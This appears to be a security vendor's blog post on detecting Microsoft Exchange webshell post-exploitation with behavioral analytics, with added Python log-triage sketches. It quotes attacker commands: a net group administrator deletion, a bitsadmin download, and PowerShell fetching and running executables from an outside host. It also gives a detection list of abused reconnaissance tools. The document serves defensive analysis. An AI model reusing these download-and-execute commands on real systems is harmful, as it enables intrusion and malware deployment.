# Busted by XDR: Detecting Microsoft Exchange Post-Exploit Activity in February

By [Unit 42](https://www.paloaltonetworks.com/blog/author/unit-42/?ts=markdown "Posts by Unit 42") | Apr 01, 2021 | 9 minutes

## Executive Summary

On March 2, Microsoft released security updates to mitigate four critical zero-day Microsoft Exchange Server vulnerabilities that were actively exploited by a threat group they call HAFNIUM. Since the initial attacks, Unit 42 and a number of other threat intelligence teams have observed multiple threat actors exploiting these zero-day vulnerabilities in the wild.

Shortly after the public disclosure, we published a [Threat Assessment](https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/) and a [threat hunting](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/?ts=markdown) blog post explaining how to actively defend against these specific vulnerabilities.

In this blog post, our goal is to highlight how our Managed Threat Hunting team was able to detect these zero-day threats using Cortex XDR before the Microsoft Exchange vulnerabilities were publicly disclosed. This naturally resulted in our clients being able to prevent these threat actors from conducting post-exploit activity before many of their peers in the industry.

## Managed Threat Hunting

The Cortex XDR Managed Threat Hunting (MTH) team is a group of cybersecurity specialists who provide threat hunting services to a subset of Cortex XDR customers. In this section we walk through how MTH team members identified and investigated a number of incidents tied to the ongoing exploitation of the recent Microsoft Exchange Server vulnerabilities. This step-by-step deep dive will hopefully give readers a glimpse into how the critical combination of machine learning in Cortex XDR and human expertise helps identify and act on zero-day threats.

#### ***Initial Detection***

In several of the cases we investigated, the Cortex XDR [analytics engine](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/analytics/analytics-concepts.html) raised an "[Uncommon net group execution](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-net-group-execution.html)" alert. This immediately caught our attention because adversaries often abuse the [net utility](https://attack.mitre.org/software/S0039/).

```
The 'net group' command was executed on [REDACTED]. Child process command line: net group "Exchange Organization administrators" administrator /del /domain. 0 other such command invocations were made in the last 30 days
```

*Table 1. Alert details.*

The Cortex XDR behavioral analytics engine detected this command invocation as an anomaly based on its machine learning models. The behavioral analytics engine works by profiling the behavior of users, hosts, endpoint processes, and more using machine learning, and then generates an alert if it detects anomalous activity indicative of attacks.
Behavioral analytics allows Cortex XDR to uncover stealthy attacker tactics and techniques with an exceptionally low rate of false positives.

In this instance, once Cortex XDR detected the attack activity, security teams were able to immediately visualize the chain of events leading to this alert, trace it back to the parent process, CMD.exe, and view the causality actor process, w3wp.exe, which was a Microsoft IIS worker process.

![Figure 1: Causality view](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-11.png)

*Figure 1: Causality view*

A review of the command line arguments for the IIS worker process found that it was associated with the "MSExchangeOWAAppPool" application pool.

![Figure 2: w3wp.exe process with MSExchangeOWAAppPool.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-12.png)

*Figure 2: w3wp.exe process with MSExchangeOWAAppPool.*

Based on the information Cortex XDR had presented to us so far, we knew that this host was a Microsoft Exchange Server and we suspected it may be compromised with a webshell.

#### ***Investigation***

Once we had an idea that we may be dealing with a webshell, we turned to [XQL Search](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-xql-language-reference.html) to answer the following questions we had surrounding this activity:

1. Were any webshells recently dropped on this server?

```
//Exchange IIS process writing ASPX files to disk
dataset = xdr_data
|filter event_type = FILE AND event_sub_type IN (FILE_CREATE_NEW, FILE_WRITE)
|filter lowercase(actor_process_image_name) = "w3wp.exe"
|filter lowercase(action_file_extension) = "aspx"
|fields agent_hostname, actor_process_image_path, actor_process_image_command_line, action_file_path, action_file_sha256
```

*Table 2. XQL Query*

The goal of our initial search was to look for the IIS worker process writing ASPX files to disk. This resulted in the identification of the following file:

```
C:\inetpub\wwwroot\aspnet_client\system_web\brLBlE7h.aspx
```

*Table 3. Webshell path*

A closer look at brLBlE7h.aspx determined that it was an ASPX page that had a China Chopper webshell embedded in the ExternalURL parameter.

![Figure 3: China Chopper webshell](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-13.png)

*Figure 3: China Chopper webshell*

2. Was a webshell used to run any other suspicious commands?

Our next query was aimed at obtaining a quick overview of any processes the Exchange IIS worker may have spawned:

```
//Exchange IIS sub process breakdown
dataset = xdr_data
|filter lowercase(os_actor_process_image_name) = "w3wp.exe" and lowercase(os_actor_process_command_line) contains "exchange"
|filter action_process_image_name != null
|comp count_distinct(action_process_image_command_line) as Count by agent_hostname, causality_actor_process_image_name, action_process_image_name
```

*Table 4. XQL Query*

![Figure 4: Query results](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-14.png)

*Figure 4: Query results*

At the same time, we also ran a separate query that would provide us with more details on any commonly abused reconnaissance executables spawned by IIS:

```
//Exchange IIS process launching executables commonly used for reconnaissance purposes.
dataset = xdr_data
|filter os_actor_process_image_name = "w3wp.exe"
|filter event_type = PROCESS and event_sub_type = PROCESS_START and lowercase(action_process_image_name) in ("arp.exe","hostname.exe","ntdsutil.exe","schtasks.exe","at.exe","ipconfig.exe","pathping.exe","systeminfo.exe","bitsadmin.exe","nbtstat.exe","ping.exe","tasklist.exe","certutil.exe","net.exe","powershell.exe","tracert.exe","cmd.exe","net1.exe","qprocess.exe","ver.exe","dsget.exe","netdom.exe","query.exe","vssadmin.exe","dsquery.exe","netsh.exe","qwinsta.exe","wevtutil.exe","find.exe","netstat.exe","reg.exe","whoami.exe","findstr.exe","nltest.exe","rundll32.exe","wmic.exe","fsutil.exe","nslookup.exe","sc.exe","wusa.exe")
|fields agent_hostname, os_actor_process_command_line, agent_version, actor_effective_username, action_process_image_name, action_process_image_command_line, actor_process_image_name, actor_process_image_command_line
```

*Table 5. XQL Query*

This query didn't result in any findings outside of the initial net group event that was flagged by the Cortex XDR Analytics Engine:

```
"cmd" /c cd /d "C:\\inetpub\\wwwroot\\aspnet_client\\system_web"&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]
```

*Table 6. Query results*

#### ***Managed Threat Hunting Response***

At this point, we reached out to this customer and other customers with similar cases with our initial findings. Thanks to the early warning from Cortex XDR, the customers were able to isolate the endpoint using Cortex XDR and initiate their incident response process before the attack escalated.
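
The command line in Table 6 has a recognisable shape: the real command sits between `cd /d "<dir>"&` and `&echo [S]&cd&echo [E]`. The following Python sketch is an added example, not code from the original post or from Cortex XDR; it generalises from that single sample to pull the wrapped command out of process-start events whose OS parent is `w3wp.exe`. The event dictionaries reuse field names from the XQL queries above, but the export format, the host name `EXCH01` and the two benign events are constructed for illustration.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Shape of the command line in Table 6: cd /d "<dir>"&<command>&echo [S]&cd&echo [E]
# (assumption: derived from that one sample, so other variants will not match)
WRAPPER = re.compile(
    r'cd\s+/d\s+"(?P<cwd>[^"]+)"\s*&(?P<body>.*)'
    r'&\s*echo\s+\[S\]\s*&\s*cd\s*&\s*echo\s+\[E\]\s*$',
    re.IGNORECASE | re.DOTALL,
)
APP_POOL = re.compile(r'-ap\s+"([^"]+)"', re.IGNORECASE)


class Finding(NamedTuple):
    host: str
    app_pool: Optional[str]
    cwd: str             # directory the wrapper changed into
    commands: List[str]  # what was run between the markers


def split_unquoted(body: str) -> List[str]:
    """Split a cmd.exe command chain on '&', ignoring '&' inside double quotes."""
    parts, current, quoted = [], [], False
    for ch in body:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    parts.append("".join(current).strip())
    return [p for p in parts if p]


def parse_wrapper(cmdline: str) -> Optional[Tuple[str, List[str]]]:
    """Return (working directory, wrapped commands) if the wrapper is present."""
    m = WRAPPER.search(cmdline)
    if m is None:
        return None
    cwd = m.group("cwd").replace("\\\\", "\\")  # logged with doubled backslashes
    return cwd, split_unquoted(m.group("body"))


def triage_events(events) -> List[Finding]:
    """Flag wrapped commands whose OS parent is the IIS worker process."""
    findings = []
    for ev in events:
        if ev["os_actor_process_image_name"].lower() != "w3wp.exe":
            continue
        parsed = parse_wrapper(ev["action_process_image_command_line"])
        if parsed is None:
            continue
        pool = APP_POOL.search(ev["os_actor_process_command_line"])
        findings.append(
            Finding(ev["agent_hostname"], pool.group(1) if pool else None, *parsed)
        )
    return findings


W3WP = r'c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" ...'
SAMPLE_EVENTS = [
    {   # child command line copied from Table 6; host name is a placeholder
        "agent_hostname": "EXCH01",
        "os_actor_process_image_name": "w3wp.exe",
        "os_actor_process_command_line": W3WP,
        "action_process_image_command_line":
            r'"cmd" /c cd /d "C:\\inetpub\\wwwroot\\aspnet_client\\system_web"'
            r'&net group "Exchange Organization administrators" administrator'
            r' /del /domain&echo [S]&cd&echo [E]',
    },
    {   # constructed benign event: ASP.NET compiling a page
        "agent_hostname": "EXCH01",
        "os_actor_process_image_name": "w3wp.exe",
        "os_actor_process_command_line": W3WP,
        "action_process_image_command_line":
            r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig',
    },
    {   # constructed: interactive cmd.exe that does not descend from IIS
        "agent_hostname": "WS07",
        "os_actor_process_image_name": "explorer.exe",
        "os_actor_process_command_line": r"C:\Windows\explorer.exe",
        "action_process_image_command_line": "cmd.exe /c dir",
    },
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.host} [{f.app_pool}] cwd={f.cwd}")
        for c in f.commands:
            print("   ran:", c)
```

The recovered working directory is worth recording with the finding: in this investigation it is the same directory that holds the ASPX file from Table 3.
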
An impact report was later sent out to all of our Managed Threat Hunting customers, informing them about the Exchange vulnerabilities and recommended actions to ensure their environments were protected. Cortex XDR customers who purchase an optional [Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting?ts=markdown) subscription receive impact reports, threat reports, and guidance to quickly resolve incidents.

## Threat Detection with Cortex XDR

Another example of a successfully contained incident occurred with another Cortex XDR customer prior to Microsoft's disclosure. Cortex XDR alerted the user to malicious activity in the form of [incident reports](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/monitoring/incidents-table). Incidents are created from higher severity alerts, while relevant lower severity alerts are grouped into them. This keeps the number of false positive incidents to a minimum while allowing Cortex XDR to maximize the information available in a single incident.
For example, the following alert created an incident:

```
* The Windows Script Host powershell.exe connected to the domain \ using the IP \
* powershell -enc \
* 0 other endpoints connected to this external ip over the last 30 days
* 0 other endpoints connected to this external domain over the last 30 days
```

*Table 7.* [Script Connecting to Rare External Host](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/script-connecting-to-rare-external-host.html) alert

And these alerts were grouped into it:

| **Source** | **Alert** | **Description** |
|------------|-----------|-----------------|
| Cortex XDR BIOC | Bitsadmin.exe used to download data | Some attacks were known to abuse [BITSAdmin](https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/) in the past to hide how data is downloaded using legitimate Windows tools |
| Cortex XDR BIOC | Commonly-abused process spawned by web server | Web server processes should normally only carry out tasks related to serving web applications |
| Cortex XDR BIOC | PowerShell runs base64-encoded commands | Running PowerShell with a base64-encoded payload in the command line is often used by attackers to evade detection |

*Table 8. Alert details.*

By observing [the causality of the incident](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-pro-admin/investigation-and-response/investigate-endpoint-alerts/causality-view.html), we can see multiple "red flags" that are indicative of the use of a webshell that downloads and runs a second stage malware:

```
c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" ...
# Raised info alert: Bitsadmin.exe used to download data
"C:\Windows\System32\bitsadmin.exe" /rawreturn /transfer getfile http://\/3.avi c:\Users\$USER$\2.bat
# Raised info alert: Commonly-abused process spawned by web server
"C:\Windows\System32\cmd.exe" /c c:\Users\$USER$\2.bat
cmd /c mkdir C:\\users\\public\\opera
# Raised medium alert: Script Connecting to Rare External Host
# Raised info alert: PowerShell runs base64-encoded commands
powershell -enc \:
(new-object System.Net.WebClient).DownloadFile('http://\/news/opera_browser.dll','C:\users\public\opera\opera_browser.dll')
(new-object System.Net.WebClient).DownloadFile('http://\/news/code','C:\users\public\opera\code')
(new-object System.Net.WebClient).DownloadFile('http://\/news/opera_browser.png','C:\users\public\opera\opera_browser.png')
(new-object System.Net.WebClient).DownloadFile('http://\/news/opera_browser.exe','C:\users\public\opera\opera_browser.exe')
# Raised info alert: Commonly-abused process spawned by web server
powershell Start-Sleep -Seconds 10
cmd /c C:\\users\\public\\opera\\opera_browser.exe
C:\\users\\public\\opera\\opera_browser.exe
msiexec.exe -k
```

*Table 9. Causality of the incident.*

We have seen multiple similar cases prior to Microsoft's disclosure, one as early as February 23. After Microsoft's disclosure, we observed a major uptick in related alerts detected by Cortex XDR as seen in this graph:

![Figure 6. Hit count graph](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/04/word-image-15.png)

*Figure 6. Hit count graph*

## Conclusion

In this post we have documented investigations that originated from Cortex XDR behavioral analytics alerts and resulted in identification and resolution of threats related to Microsoft Exchange Server vulnerabilities prior to any public disclosures.
The onset of these alerts by the machine learning models in XDR was the critical catalyst in numerous cases and expert follow-up by the XDR Managed Threat Hunting specialists led to swift containment of the threat way before any public disclosures were made.

[Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting?ts=markdown), an add-on service for Cortex XDR, lets you augment your team with Unit 42 threat hunters, who continuously monitor and search through your Cortex XDR data to uncover emerging threats in your environment.

### Additional Resources

* [Hunting for the Recent Attacks Targeting Microsoft Exchange](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/?ts=markdown)
* [Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells](https://unit42.paloaltonetworks.com/china-chopper-webshell/)
* [Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server](https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/)
* [HAFNIUM targeting Exchange Servers with 0-day exploits](https://docs.google.com/document/u/0/d/1FHFjilP-ZH2JEyUGVJWolTe--PRIkrDPCAFiIJvuBZ8/edit)
* [Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities](https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/)
* [Detect and Prevent Web Shell Malware](https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF)
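
During triage of the "PowerShell runs base64-encoded commands" alert in Table 9, the first step is to turn the `-enc` argument back into script text and list what it fetches and where it writes. The following Python sketch is an added example, not code from the original post or from Cortex XDR. Because the page redacts the encoded blob and the download host, the sample command line is constructed here from the decoded lines shown in Table 9, with `stage.example.invalid` as a placeholder host.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

DOWNLOADFILE = re.compile(
    r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.IGNORECASE
)
EXECUTABLE_EXT = (".exe", ".dll", ".bat", ".ps1")


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand (or an abbreviation), else None.

    PowerShell accepts any unambiguous prefix of the parameter name (-e, -enc, ...)
    plus the alias -ec; the value is base64 over UTF-16LE text.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] not in "-/" or not name:
            continue
        if not ("encodedcommand".startswith(name) or name == "ec"):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def extract_downloads(script):
    """List (url, destination) pairs for each WebClient.DownloadFile call."""
    return DOWNLOADFILE.findall(script)


def triage_encoded(cmdline):
    """Summarise what an encoded PowerShell command line downloads, or None."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    downloads = extract_downloads(script)
    hosts = {urlparse(url).hostname for url, _ in downloads}
    return {
        "script": script,
        "hosts": sorted(h for h in hosts if h),
        # files that can be executed or loaded once they land on disk
        "executables": [d for _, d in downloads if d.lower().endswith(EXECUTABLE_EXT)],
        # writes into the shared Public profile, as in Table 9
        "public_profile": [
            d for _, d in downloads if d.lower().startswith("c:\\users\\public\\")
        ],
    }


# Constructed sample: decoded lines from Table 9 with a placeholder host.
PLACEHOLDER_HOST = "stage.example.invalid"
SAMPLE_SCRIPT = "\n".join(
    "(new-object System.Net.WebClient).DownloadFile("
    "'http://%s/news/%s','C:\\users\\public\\opera\\%s')" % (PLACEHOLDER_HOST, n, n)
    for n in ("opera_browser.dll", "code", "opera_browser.png", "opera_browser.exe")
)
SAMPLE_CMDLINE = "powershell -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")
).decode("ascii")

if __name__ == "__main__":
    report = triage_encoded(SAMPLE_CMDLINE)
    print("hosts:", report["hosts"])
    for path in report["executables"]:
        print("executable written:", path)
```
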